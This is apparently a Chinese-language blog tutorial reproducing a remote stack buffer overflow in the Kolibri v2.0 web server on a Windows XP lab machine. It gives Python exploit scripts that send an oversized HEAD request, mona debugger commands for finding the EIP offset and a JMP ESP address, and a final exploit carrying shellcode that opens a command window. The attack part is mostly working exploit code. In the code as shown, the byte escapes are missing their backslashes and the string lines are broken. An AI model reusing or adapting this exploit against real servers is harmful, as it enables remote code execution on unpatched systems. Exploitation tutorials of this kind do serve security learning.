Kolibri v2.0-Buffer Overflow成功复现

Kolibri v2.0-Buffer Overflow成功复现及分析

文件下载地址：http://pan.baidu.com/s/1eS9r9lS

 正文

本次讲解用JMP ESP的方法溢出

关于网上的寻蛋指令将会在末尾给出地址

环境：windows xp sp3

工具：Immunity Debugger

配置Kolibri并开启服务

选中根目录  写入index文件

 然后访问目标机器的8080端口

配置完毕

初步寻找溢出点

已经配置完了，接下来就开始溢出

用到下面的一个python脚本

import socket

poc = "A" * 1000;
buffer = (
"HEAD /" + poc + " HTTP/1.1
"
"Host: 192.168.1.2:8080
"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
"
"Keep-Alive: 115
"
"Connection: keep-alive

")

expl = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
expl.connect(("192.168.1.29",8080));
expl.send(buffer);
expl.close();

发送1000个A来判断程序是否溢出了

用Immunity Debugger加载进一步分析

发现攻击后程序自动退出了  原因是程序崩溃后无法继续执行，所以这里我才用Immunity Debugger来中断它防止自动退出

发现栈中的数据都被41（ascii的A）填充了。

我们用到Immunity Debugger的mona模块来生成个寻找指令

!mona pattern_create 600

生成一串偏移地址为600的字符串

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9

重新构造exp

import socket

poc = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9";
buffer = (
"HEAD /" + poc + " HTTP/1.1
"
"Host: 192.168.109.128:8080
"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
"
"Keep-Alive: 115
"
"Connection: keep-alive

")

expl = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
expl.connect(("192.168.109.128",8080));
expl.send(buffer);
expl.close();

继续用到Immunity Debugger来调试

发现这次指针指向了0152FB28的位置  但是由于esp是向下跳转的  所以以此类推EIP的位置就是esp-4

也就是当前的0152FB24的位置

我们再用mona查看0152FB24地址上的内容32724131偏移地址为多少

!mona po 32724131

偏移地址为515 对应的数值为1Ar2

所以只需要把对应的1Ar2的值换成JMP ESP地址就可以顺利成章的跳转了（相关知识请看我博客的缓冲区溢出讲解）

开始溢出程序

由于EIP是32位的寄存器 所以我们的EIP数值应该是4位 也就是516~519

所以前面515个字符我们都用A来代替

最后构造exp为

poc = "A" * 515+"JMP ESP地址"+"shellcode"

JMP ESP的地址是多少呢？？

这里继续用mona来查看

!mona jmp -r esp

在根目录查看

随便从中选取一个  这里我选取0x7d5a30d7

构造最终的exp为

poc = "A" * 515+"xD7x30x5Ax7D"+"shellcode"

shellcode用一个弹出DOS窗口的

终极终极终极终极exp生成如下

import socket

poc = "A" * 515+"xD7x30x5Ax7D"+"x55x8BxECx33xC0x50x50x50xC6x45xF4x4DxC6x45xF5x53xC6x45xF6x56xC6x45xF7x43xC6x45xF8x52xC6x45xF9x54xC6x45xFAx2ExC6x45xFBx44xC6x45xFCx4CxC6x45xFDx4Cx8Dx45xF4x50xBAx7Bx1Dx80x7CxFFxD2x55x8BxECx83xECx2CxB8x63x6Fx6Dx6Dx89x45xF4xB8x61x6Ex64x2Ex89x45xF8xB8x63x6Fx6Dx22x89x45xFCx33xD2x88x55xFFx8Dx45xF4x50xB8xC7x93xBFx77xFFxD0";
buffer = (
"HEAD /" + poc + " HTTP/1.1
""Host: 192.168.109.128:8080
"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
"
"Keep-Alive: 115
"
"Connection: keep-alive

")

expl = socket.socket(socket.AF_INET,socket.SOCK_STREAM); 
expl.connect(("192.168.109.128",8080));   
expl.send(buffer);
expl.close(); 

可以看到我们成功远程溢出了目标服务器

结束语：

原文地址：http://bbs.pediy.com/thread-217595.htm

原文是用的寻蛋指令，这样的好处可以防止出现以下问题

当我们用JMP ESP溢出后 发现还是会出现错误框框

用寻蛋指令就不会出现类似问题

有兴趣的读者可以自己到原文读读原创大佬的智慧